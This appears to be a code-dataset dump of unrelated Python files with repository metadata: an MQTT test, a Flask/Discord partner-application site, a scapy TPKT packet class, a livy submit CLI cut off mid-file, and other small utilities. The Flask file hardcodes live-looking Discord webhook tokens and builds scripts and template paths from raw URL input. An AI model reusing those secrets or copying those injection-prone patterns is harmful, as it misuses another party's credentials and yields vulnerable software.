from utils import ValueListSensor, ValidateAndStopSubscriber
seed()
try:
import hbmqtt
HBMQTT_AVAILABLE = True
except ImportError:
HBMQTT_AVAILABLE = False
URL = "mqtt://localhost:1883"
VALUES = [
1.0,
2.5,
3.7,
4.1,
8.1,
0.5,
6.5,
4.5,
3.9,
6.5
]
EXPECTED = [
2.5,
4.1,
4.5,
6.5
]
def msg_to_event(msg):
return SensorEvent(sensor_id=msg[0], ts=msg[1], val=msg[2])
CHARS=string.ascii_letters+string.digits
def get_topic_name(test_class):
return test_class.__class__.__name__ + ''.join([ choice(CHARS) for i in range(5) ])
@unittest.skipUnless(HBMQTT_AVAILABLE,
"HBMQTT library not installed for python at %s" %
sys.executable)
class TestCase(unittest.TestCase):
def setUp(self):
# Creating a new event loop each test case does not seem to work.
# I think it is due to hbmqtt not cleaning up some state in the asyncio
# layer.
#self.loop = asyncio.new_event_loop()
self.loop = asyncio.get_event_loop()
self.sched = Scheduler(self.loop)
def tearDown(self):
pass
#self.loop.stop()
#self.loop.close()
def test_client_only(self):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
self.sched.schedule_periodic(sensor, 0.5)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
print("test_client_only completed")
def send_and_recv_body(self, sleep_timeout):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
qr = QueueReader(URL, TOPIC, self.sched, timeout=sleep_timeout)
self.sched.schedule_periodic(sensor, 0.5)
stop_qr = self.sched.schedule_on_main_event_loop(qr)
vs = ValidateAndStopSubscriber(EXPECTED, self, stop_qr)
qr.select(msg_to_event).subscribe(vs)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
self.assertEqual(qr.state, QueueReader.FINAL_STATE)
self.assertEqual(vs.next_idx, len(EXPECTED))
print("send_and_recv_bod(%s) completed" % sleep_timeout)
def test_short_timeout(self):
self.send_and_recv_body(0.1)
def test_long_timeout(self):
self.send_and_recv_body(3.0)
if __name__ == '__main__':
unittest.main()
| # Copyright 2017 by MPI-SWS and Data-Ken Research.
# Licensed under the Apache 2.0 License.
"""Test async version of mqtt libraries. Depends on hbmqtt
(https://github.com/beerfactory/hbmqtt)
"""
import unittest
import sys
import asyncio
import string
from random import choice, seed
from antevents.base import Scheduler, SensorPub, SensorEvent
import antevents.linq.output
import antevents.linq.combinators
import antevents.linq.select
from antevents.adapters.mqtt_async import QueueWriter, QueueReader
from antevents.linq.transducer import PeriodicMedianTransducer
from utils import ValueListSensor, ValidateAndStopSubscriber
seed()
try:
import hbmqtt
HBMQTT_AVAILABLE = True
except ImportError:
HBMQTT_AVAILABLE = False
URL = "mqtt://localhost:1883"
VALUES = [
1.0,
2.5,
3.7,
4.1,
8.1,
0.5,
6.5,
4.5,
3.9,
6.5
]
EXPECTED = [
2.5,
4.1,
4.5,
6.5
]
def msg_to_event(msg):
return SensorEvent(sensor_id=msg[0], ts=msg[1], val=msg[2])
CHARS=string.ascii_letters+string.digits
def get_topic_name(test_class):
return test_class.__class__.__name__ + ''.join([ choice(CHARS) for i in range(5) ])
@unittest.skipUnless(HBMQTT_AVAILABLE,
"HBMQTT library not installed for python at %s" %
sys.executable)
class TestCase(unittest.TestCase):
def setUp(self):
# Creating a new event loop each test case does not seem to work.
# I think it is due to hbmqtt not cleaning up some state in the asyncio
# layer.
#self.loop = asyncio.new_event_loop()
self.loop = asyncio.get_event_loop()
self.sched = Scheduler(self.loop)
def tearDown(self):
pass
#self.loop.stop()
#self.loop.close()
def test_client_only(self):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
self.sched.schedule_periodic(sensor, 0.5)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
print("test_client_only completed")
def send_and_recv_body(self, sleep_timeout):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
qr = QueueReader(URL, TOPIC, self.sched, timeout=sleep_timeout)
self.sched.schedule_periodic(sensor, 0.5)
stop_qr = self.sched.schedule_on_main_event_loop(qr)
vs = ValidateAndStopSubscriber(EXPECTED, self, stop_qr)
qr.select(msg_to_event).subscribe(vs)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
self.assertEqual(qr.state, QueueReader.FINAL_STATE)
self.assertEqual(vs.next_idx, len(EXPECTED))
print("send_and_recv_bod(%s) completed" % sleep_timeout)
def test_short_timeout(self):
self.send_and_recv_body(0.1)
def test_long_timeout(self):
self.send_and_recv_body(3.0)
if __name__ == '__main__':
unittest.main() | pt | 0.169016 | 2.116433 | 2 |
edit/main.py | team-alpha-kr/Partner-pyWeb | 0 | 13510 | <filename>edit/main.py
# -*- coding: utf8 -*-
import os
from flask import Flask, request, render_template, request, redirect, url_for, jsonify
from flask_discord import DiscordOAuth2Session, requires_authorization
from discord import Webhook, RequestsWebhookAdapter
webhook = Webhook.partial(814742019489660939, "rvSBVHtGPflSASjeGEEKdZxC5Z_w1UM_ovc_xD0ZPcFy1UeUybFM4ClGANu6CEWTQame", adapter=RequestsWebhookAdapter())
run_webhook = Webhook.partial(804602090537091072, "6ZMww14Nh7OVeeHUt5bWeixreoWQmSzPVfFmIpU3BEr8OYLGqickY1VyoqH2IeMs1Kd8", adapter=RequestsWebhookAdapter())
app = Flask(__name__)
app.secret_key = b"<KEY>"
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "false"
app.config["DISCORD_CLIENT_ID"] = "801279922722045962"
app.config["DISCORD_CLIENT_SECRET"] = "<KEY>" # Discord client secret.
# app.config["DISCORD_REDIRECT_URI"] = "http://localhost:3333/callback" # URL to your callback endpoint.
app.config["DISCORD_REDIRECT_URI"] = "https://partner-e.alphakr.xyz/callback" # URL to your callback endpoint.
app.config["DISCORD_BOT_TOKEN"] = "<KEY>"
discord = DiscordOAuth2Session(app)
def on_json_loading_failed_return_dict(e):
return '없음'
@app.route('/', methods=['GET','POST'])
def index():
return render_template('form/1.html')
@app.route("/login", methods=["GET"])
def login():
if not discord.authorized:
return discord.create_session(scope=['guilds', 'email', 'identify'])
else:
return render_template("login.html")
@app.route("/callback", methods=["GET", "POST"])
def callback():
data = discord.callback()
redirect_to = data.get("redirect", "/form/1")
return redirect(redirect_to)
@app.route("/logout", methods=['GET', 'POST'])
def logout():
if discord.authorized:
discord.revoke()
return redirect(url_for("index"))
else:
return redirect(url_for("index"))
@app.route('/form/1', methods=['GET','POST'])
def form1():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
return render_template('form/1.html', user=user)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/2', methods=['GET','POST'])
def form2():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
return render_template('form/2.html', code=code, nickname=nickname)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/3', methods=['GET','POST'])
def form3():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
return render_template('form/3.html', code=code, nickname=nickname, server=server, member=member, category=category, etc_text=etc_text)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/action', methods=['GET','POST'])
def action():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
message = request.form['message']
image = request.form['image']
video = request.form['video']
if etc_text == '':
etc_text = 'Unknown'
webhook.send(f"<@<PASSWORD>56043785>\n✅ 파트너 수정 신청이 도착했습니다.\n\n파트너 코드: {code}\n신청자: {nickname}\n서버(초대 링크): {server}\n멤버 수: {member}\n카테고리 정보: {category} ({etc_text})\n홍보지: {message}\n이미지: {image}\n영상: {video}")
return render_template('form/action.html', code = code)
else: #로그인이 안되어있는가?
return redirect(url_for("index"))
@app.route('/guide/<id>', methods=['GET', 'POST'])
def guide(id):
return f"<script>location.replace('https://team-alpha-kr.github.io/Partner-Guide/{id}.html');</script>"
# S: 2021 파트너 웹사이트 개편 코드
# S: 210210 공지사항
@app.route('/notice/<id>', methods=['GET', 'POST'])
def notice(id):
return render_template(f"2021temp/notice/{id}.html")
# E: 210210 공지사항
# E: 2021 파트너 웹사이트 개편 코드
@app.errorhandler(404)
def page_not_found(error):
return render_template("error/404.html")
@app.errorhandler(500)
def servererror(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 500 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/500.html")
@app.errorhandler(400)
def badrequest(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 400 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/400.html")
run_webhook.send("✅ 파트너 정보 수정 - 웹사이트가 실행이 되었습니다!")
app.run(host='0.0.0.0', port=3333, debug=False) | <filename>edit/main.py
# -*- coding: utf8 -*-
import os
from flask import Flask, request, render_template, request, redirect, url_for, jsonify
from flask_discord import DiscordOAuth2Session, requires_authorization
from discord import Webhook, RequestsWebhookAdapter
webhook = Webhook.partial(814742019489660939, "rvSBVHtGPflSASjeGEEKdZxC5Z_w1UM_ovc_xD0ZPcFy1UeUybFM4ClGANu6CEWTQame", adapter=RequestsWebhookAdapter())
run_webhook = Webhook.partial(804602090537091072, "6ZMww14Nh7OVeeHUt5bWeixreoWQmSzPVfFmIpU3BEr8OYLGqickY1VyoqH2IeMs1Kd8", adapter=RequestsWebhookAdapter())
app = Flask(__name__)
app.secret_key = b"<KEY>"
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "false"
app.config["DISCORD_CLIENT_ID"] = "801279922722045962"
app.config["DISCORD_CLIENT_SECRET"] = "<KEY>" # Discord client secret.
# app.config["DISCORD_REDIRECT_URI"] = "http://localhost:3333/callback" # URL to your callback endpoint.
app.config["DISCORD_REDIRECT_URI"] = "https://partner-e.alphakr.xyz/callback" # URL to your callback endpoint.
app.config["DISCORD_BOT_TOKEN"] = "<KEY>"
discord = DiscordOAuth2Session(app)
def on_json_loading_failed_return_dict(e):
return '없음'
@app.route('/', methods=['GET','POST'])
def index():
return render_template('form/1.html')
@app.route("/login", methods=["GET"])
def login():
if not discord.authorized:
return discord.create_session(scope=['guilds', 'email', 'identify'])
else:
return render_template("login.html")
@app.route("/callback", methods=["GET", "POST"])
def callback():
data = discord.callback()
redirect_to = data.get("redirect", "/form/1")
return redirect(redirect_to)
@app.route("/logout", methods=['GET', 'POST'])
def logout():
if discord.authorized:
discord.revoke()
return redirect(url_for("index"))
else:
return redirect(url_for("index"))
@app.route('/form/1', methods=['GET','POST'])
def form1():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
return render_template('form/1.html', user=user)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/2', methods=['GET','POST'])
def form2():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
return render_template('form/2.html', code=code, nickname=nickname)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/3', methods=['GET','POST'])
def form3():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
return render_template('form/3.html', code=code, nickname=nickname, server=server, member=member, category=category, etc_text=etc_text)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/action', methods=['GET','POST'])
def action():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
message = request.form['message']
image = request.form['image']
video = request.form['video']
if etc_text == '':
etc_text = 'Unknown'
webhook.send(f"<@<PASSWORD>56043785>\n✅ 파트너 수정 신청이 도착했습니다.\n\n파트너 코드: {code}\n신청자: {nickname}\n서버(초대 링크): {server}\n멤버 수: {member}\n카테고리 정보: {category} ({etc_text})\n홍보지: {message}\n이미지: {image}\n영상: {video}")
return render_template('form/action.html', code = code)
else: #로그인이 안되어있는가?
return redirect(url_for("index"))
@app.route('/guide/<id>', methods=['GET', 'POST'])
def guide(id):
return f"<script>location.replace('https://team-alpha-kr.github.io/Partner-Guide/{id}.html');</script>"
# S: 2021 파트너 웹사이트 개편 코드
# S: 210210 공지사항
@app.route('/notice/<id>', methods=['GET', 'POST'])
def notice(id):
return render_template(f"2021temp/notice/{id}.html")
# E: 210210 공지사항
# E: 2021 파트너 웹사이트 개편 코드
@app.errorhandler(404)
def page_not_found(error):
return render_template("error/404.html")
@app.errorhandler(500)
def servererror(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 500 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/500.html")
@app.errorhandler(400)
def badrequest(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 400 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/400.html")
run_webhook.send("✅ 파트너 정보 수정 - 웹사이트가 실행이 되었습니다!")
app.run(host='0.0.0.0', port=3333, debug=False) | ko | 1.00007 | 2.744826 | 3 |
protocols/tpkt.py | dparnishchev/s7scan | 98 | 13511 | from scapy.fields import ByteField, ShortField
from scapy.packet import Packet
class TPKT(Packet):
name = "TPKT"
fields_desc = [ByteField("version", 3),
ByteField("reserved", 0),
ShortField("length", 0x0000)]
| from scapy.fields import ByteField, ShortField
from scapy.packet import Packet
class TPKT(Packet):
name = "TPKT"
fields_desc = [ByteField("version", 3),
ByteField("reserved", 0),
ShortField("length", 0x0000)]
| none | 1 | 2.327009 | 2 |
pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 3 | 13512 | <reponame>pylbm/pylbm_ui
import ipyvuetify as v
class Message(v.Container):
def __init__(self, message):
self.message = v.Alert(
children=[f'{message}...'],
class_='primary--text'
)
super().__init__(
children=[
v.Row(
children=[
v.ProgressCircular(
indeterminate=True,
color='primary',
size=70,
width=4
)
],
justify='center'
),
v.Row(
children=[
self.message,
],
justify='center'
)
]
)
def update(self, new_message):
self.message.children = [f'{new_message}...'] | import ipyvuetify as v
class Message(v.Container):
def __init__(self, message):
self.message = v.Alert(
children=[f'{message}...'],
class_='primary--text'
)
super().__init__(
children=[
v.Row(
children=[
v.ProgressCircular(
indeterminate=True,
color='primary',
size=70,
width=4
)
],
justify='center'
),
v.Row(
children=[
self.message,
],
justify='center'
)
]
)
def update(self, new_message):
self.message.children = [f'{new_message}...'] | none | 1 | 2.355824 | 2 |
args_parser.py | vmartinv/capital_gains_calculator | 0 | 13513 | import argparse
import datetime
def get_last_elapsed_tax_year() -> int:
now = datetime.datetime.now()
if now.date() >= datetime.date(now.year, 4, 6):
return now.year - 1
else:
return now.year - 2
def create_parser() -> argparse.ArgumentParser:
# Schwab transactions
# Montly GBP/USD history from
# https://www.gov.uk/government/collections/exchange-rates-for-customs-and-vat
default_gbp_history_file = "GBP_USD_monthly_history.csv"
# Initial vesting and spin-off prices
default_initial_prices_file = "initial_prices.csv"
default_pdf_report = "calculations.pdf"
parser = argparse.ArgumentParser(
description="Calculate capital gains from stock transactions.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--tax_year",
type=int,
default=get_last_elapsed_tax_year(),
nargs="?",
help="First year of the tax year to calculate gains on",
)
parser.add_argument(
"--schwab",
type=str,
nargs="?",
help="file containing the exported transactions from Schwab",
)
parser.add_argument(
"--trading212",
type=str,
nargs="?",
help="folder containing the exported transaction files from Trading212",
)
parser.add_argument(
"--gbp_history",
type=str,
default=default_gbp_history_file,
nargs="?",
help="monthly GBP/USD prices from HMRC",
)
parser.add_argument(
"--initial_prices",
type=str,
default=default_initial_prices_file,
nargs="?",
help="file cointaining stock prices in USD at the moment of vesting, split, etc.",
)
parser.add_argument(
"--report",
type=str,
default=default_pdf_report,
nargs="?",
help="where to save the generated pdf report",
)
return parser
| import argparse
import datetime
def get_last_elapsed_tax_year() -> int:
now = datetime.datetime.now()
if now.date() >= datetime.date(now.year, 4, 6):
return now.year - 1
else:
return now.year - 2
def create_parser() -> argparse.ArgumentParser:
# Schwab transactions
# Montly GBP/USD history from
# https://www.gov.uk/government/collections/exchange-rates-for-customs-and-vat
default_gbp_history_file = "GBP_USD_monthly_history.csv"
# Initial vesting and spin-off prices
default_initial_prices_file = "initial_prices.csv"
default_pdf_report = "calculations.pdf"
parser = argparse.ArgumentParser(
description="Calculate capital gains from stock transactions.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--tax_year",
type=int,
default=get_last_elapsed_tax_year(),
nargs="?",
help="First year of the tax year to calculate gains on",
)
parser.add_argument(
"--schwab",
type=str,
nargs="?",
help="file containing the exported transactions from Schwab",
)
parser.add_argument(
"--trading212",
type=str,
nargs="?",
help="folder containing the exported transaction files from Trading212",
)
parser.add_argument(
"--gbp_history",
type=str,
default=default_gbp_history_file,
nargs="?",
help="monthly GBP/USD prices from HMRC",
)
parser.add_argument(
"--initial_prices",
type=str,
default=default_initial_prices_file,
nargs="?",
help="file cointaining stock prices in USD at the moment of vesting, split, etc.",
)
parser.add_argument(
"--report",
type=str,
default=default_pdf_report,
nargs="?",
help="where to save the generated pdf report",
)
return parser
| es | 0.131111 | 3.130347 | 3 |
src/pydts/examples_utils/datasets.py | tomer1812/pydts | 0 | 13514 | import pandas as pd
from pydts.config import *
DATASETS_DIR = os.path.join(os.path.dirname((os.path.dirname(__file__))), 'datasets')
def load_LOS_simulated_data():
os.path.join(os.path.dirname(__file__))
return pd.read_csv(os.path.join(DATASETS_DIR, 'LOS_simulated_data.csv')) | import pandas as pd
from pydts.config import *
DATASETS_DIR = os.path.join(os.path.dirname((os.path.dirname(__file__))), 'datasets')
def load_LOS_simulated_data():
os.path.join(os.path.dirname(__file__))
return pd.read_csv(os.path.join(DATASETS_DIR, 'LOS_simulated_data.csv')) | none | 1 | 2.498811 | 2 |
busker/migrations/0013_auto_20200906_1933.py | tinpan-io/django-busker | 2 | 13515 | <gh_stars>1-10
# Generated by Django 3.1.1 on 2020-09-06 19:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('busker', '0012_auto_20200905_2042'),
]
operations = [
migrations.AlterModelOptions(
name='downloadcode',
options={'ordering': ['id']},
),
migrations.AlterField(
model_name='file',
name='work',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='busker.downloadablework'),
),
]
| # Generated by Django 3.1.1 on 2020-09-06 19:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('busker', '0012_auto_20200905_2042'),
]
operations = [
migrations.AlterModelOptions(
name='downloadcode',
options={'ordering': ['id']},
),
migrations.AlterField(
model_name='file',
name='work',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='busker.downloadablework'),
),
] | fr | 0.13841 | 1.372627 | 1 |
livy/cli/submit.py | tzing/python-livy | 1 | 13516 | """Submit a batch task to livy server."""
import argparse
import datetime
import importlib
import json
import logging
import re
import typing
import livy
import livy.cli.config
import livy.cli.logging
logger = logging.getLogger(__name__)
class PreSubmitArguments(argparse.Namespace):
"""Typed :py:class:`~argparse.Namespace` for arguments before task submission."""
# task
script: str
args: typing.List[str]
class_name: str
jars: typing.List[str]
py_files: typing.List[str]
files: typing.List[str]
archives: typing.List[str]
queue_name: str
session_name: str
api_url: str
driver_memory: str
driver_cores: int
executor_memory: str
executor_cores: int
num_executors: int
spark_conf: typing.List[typing.Tuple[str, str]]
# log
watch_log: bool
# time
time_prog_start: datetime.datetime
"Local time this script is called"
class TaskEndedArguments(PreSubmitArguments):
"""Typed :py:class:`~argparse.Namespace` for arguments when task is ended.
It contains all attributes from :py:class:`~livy.cli.submit.PreSubmitArguments`.
"""
# task
batch_id: int
"Batch ID response by livy server"
state: str
"Task ended state"
# time
time_task_submit: datetime.datetime
"Local time before task is submitted"
time_task_ended: datetime.datetime
"Local time that detected task is ended"
def main(argv=None):
"""CLI entrypoint"""
# parse argument
cfg = livy.cli.config.load()
parser = argparse.ArgumentParser(
prog="livy submit",
description=__doc__,
)
parser.add_argument(
"script",
help="Path to the script that contains the application to be executed",
)
parser.add_argument(
"args",
nargs="*",
help="Arguments for the task script",
)
parser.add_argument(
"--class-name",
metavar="COM.EXAMPLE.FOO",
help="Application Java/Spark main class (for Java/Scala task)",
)
parser.add_argument(
"--jars",
nargs="+",
metavar="FOO.JAR",
help="Java dependencies to be used in this batch",
)
parser.add_argument(
"--py-files",
nargs="+",
metavar="FOO.ZIP",
help="Python dependencies to be used in this batch",
)
parser.add_argument(
"--files",
nargs="+",
metavar="FOO.TXT",
help="Files to be used in this batch",
)
parser.add_argument(
"--archives",
nargs="+",
metavar="FOO.TAR",
help="Archives to be used in this batch",
)
parser.add_argument(
"--queue-name",
metavar="DEFAULT",
help="The name of the YARN queue to which submitted",
)
parser.add_argument(
"--session-name",
metavar="HELLO",
help="The session name to execute this batch",
)
group = parser.add_argument_group("pre-submit actions")
group.add_argument(
"--on-pre-submit",
metavar="PLUG",
nargs="+",
default=cfg.submit.pre_submit,
help="Run plugin(s) before submit",
)
group = parser.add_argument_group("livy server configuration")
group.add_argument(
"--api-url",
required=cfg.root.api_url is None,
default=cfg.root.api_url,
help="Base-URL for Livy API server",
)
group.add_argument(
"--driver-memory",
metavar="10G",
default=cfg.submit.driver_memory,
type=argmem,
help="Amount of memory to use for the driver process.",
)
group.add_argument(
"--driver-cores",
metavar="N",
default=cfg.submit.driver_cores,
type=int,
help="Number of cores to use for the driver process.",
)
group.add_argument(
"--executor-memory",
metavar="10G",
default=cfg.submit.executor_memory,
type=argmem,
help="Amount of memory to use for the executor process.",
)
group.add_argument(
"--executor-cores",
metavar="N",
default=cfg.submit.executor_cores,
type=int,
help="Number of cores to use for each executor.",
)
group.add_argument(
"--num-executors",
metavar="N",
default=cfg.submit.num_executors,
type=int,
help="Number of executors to launch for this batch.",
)
group.add_argument(
"--spark-conf",
metavar="CONF_NAME=VALUE",
nargs="+",
default=cfg.submit.spark_conf,
type=argkvpair,
help="Spark configuration properties.",
)
group = parser.add_argument_group("post-submit actions")
g = group.add_mutually_exclusive_group()
g.set_defaults(watch_log=cfg.submit.watch_log)
g.add_argument(
"--watch-log",
dest="watch_log",
action="store_true",
help="Watching for logs until it is finished",
)
g.add_argument(
"--no-watch-log",
dest="watch_log",
action="store_false",
help="Not to watch for logs. Only submit the task and quit.",
)
group = parser.add_argument_group("after-task-finish actions")
group.add_argument(
"--on-task-success",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_success,
help="Run plugin(s) on task is finished and success",
)
group.add_argument(
"--on-task-failed",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and failed",
)
group.add_argument(
"--on-task-ended",
metavar="PLUG",
nargs="+",
